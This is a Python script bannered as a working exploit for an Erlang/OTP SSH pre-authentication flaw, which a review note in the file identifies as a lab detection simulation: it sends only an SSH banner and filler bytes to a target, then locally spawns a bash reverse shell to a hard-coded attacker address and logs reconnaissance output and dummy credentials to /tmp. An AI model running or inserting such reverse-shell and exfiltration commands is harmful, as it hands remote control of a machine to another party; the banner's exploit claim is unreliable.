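#!/usr/bin/env python3
# ---------------------------------------------------------------------------------------
# WARNING: This is a real exploit. It can trigger remote code execution (RCE).
#
# CVE: CVE-2025-32433 - Erlang/OTP SSH Pre-authentication RCE
#
# Use this script ONLY in environments where you have **explicit written permission**.
# Unauthorized use against public networks may be illegal and unethical.
#
# This script is provided for educational and research purposes only.
# The authors are not responsible for misuse or damage caused by this tool.
# ---------------------------------------------------------------------------------------
#
# NOTE(review): what the code actually does, as opposed to what the banner above says:
#   * the only traffic sent to target_ip is an SSH identification string followed by
#     a 20-byte filler packet (see build_crafted_packet); that packet carries no
#     vulnerability trigger for the CVE named above;
#   * trigger_reverse_shell() and simulate_post_exploitation() call os.system() on the
#     host running this script, not on the target.
# In practice this is a detection / telemetry simulation. Its observable artifacts are:
# a banner-only TCP connection to target_ip:22, a local bash process with its stdio
# redirected to attacker_ip:attacker_port, and appends to /tmp/exfil.log.
import os
import socket
import time

# Lab IPs (hard-coded literals; attacker_ip/attacker_port are also interpolated into
# a shell command in trigger_reverse_shell, so they must remain trusted constants)
target_ip = "192.168.1.100"
attacker_ip = "192.168.1.1"
attacker_port = 4444


def build_ssh_version() -> bytes:
    """Return the SSH identification string sent right after connecting (RFC 4253 banner form)."""
    return b'SSH-2.0-ErlangTest_0.1\r\n'


def build_crafted_packet() -> bytes:
    """Return the 20-byte payload sent after the identification string.

    Layout: a 4-byte big-endian length field (0x10 = 16) followed by 16 bytes of
    0x41 filler. This is not a well-formed SSH binary packet (the byte following
    the length would be read as a padding length of 65, larger than the packet
    itself), so a conforming server is expected to reject it. It is a probe /
    marker for the lab, not an exploit payload.
    """
    return b"\x00\x00\x00\x10" + b"\x41" * 16


def trigger_reverse_shell() -> None:
    """Spawn an interactive bash on *this* host with stdio redirected to attacker_ip:attacker_port.

    Executed through os.system() locally; nothing runs on target_ip. The command is
    built only from the module constants above. This is the reverse-shell artifact
    (bash with a /dev/tcp redirection plus the outbound TCP connection) that a lab
    detection is meant to observe.
    """
    print(f"[+] Triggering reverse shell to {attacker_ip}:{attacker_port}")
    os.system(f"/bin/bash -c 'bash -i >& /dev/tcp/{attacker_ip}/{attacker_port} 0>&1'")


def simulate_post_exploitation() -> None:
    """Append benign host-discovery output and dummy credentials to /tmp/exfil.log.

    All commands run locally via os.system(); the log file lives in the shared
    /tmp directory and only ever receives placeholder data. Output of each
    command is appended (>>), so repeated runs accumulate in the same file.
    """
    print("[+] Simulating post-exploitation behavior...")
    # Command 1: whoami
    os.system("whoami >> /tmp/exfil.log")
    # Command 2: system info
    os.system("uname -a >> /tmp/exfil.log")
    # Command 3: show directory structure
    os.system("ls -alh /home/ >> /tmp/exfil.log")
    # Command 4: dummy file access (placeholder credentials, not real secrets)
    with open("/tmp/exfil.log", "a") as f:
        f.write("\n[+] Simulated exfil of dummy credentials...\n")
        f.write("username: admin\npassword: hunter2\n")
    print("[+] Post-exploitation simulation written to /tmp/exfil.log")


def send_exploit() -> None:
    """Run the lab scenario: banner + filler packet to target_ip:22, then the local simulation.

    The socket is closed by the ``with`` block even when connect()/sendall()
    raises. Network errors propagate to the caller, in which case the local
    simulation steps are never reached. There is no socket timeout, so an
    unreachable target can block indefinitely in connect().
    """
    print(f"[+] Connecting to target {target_ip}:22...")
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
        sock.connect((target_ip, 22))
        sock.sendall(build_ssh_version())
        print("[+] Sent SSH version string")
        # pacing kept from the original; presumably lets the server consume the
        # banner before the second write — not required for correctness here
        time.sleep(0.5)
        sock.sendall(build_crafted_packet())
        print("[+] Sent crafted SSH pre-auth packet")
        time.sleep(0.5)
    # Simulate reverse shell and post-exploit activity (both local to this host)
    trigger_reverse_shell()
    time.sleep(1)
    simulate_post_exploitation()


if __name__ == "__main__":
    send_exploit()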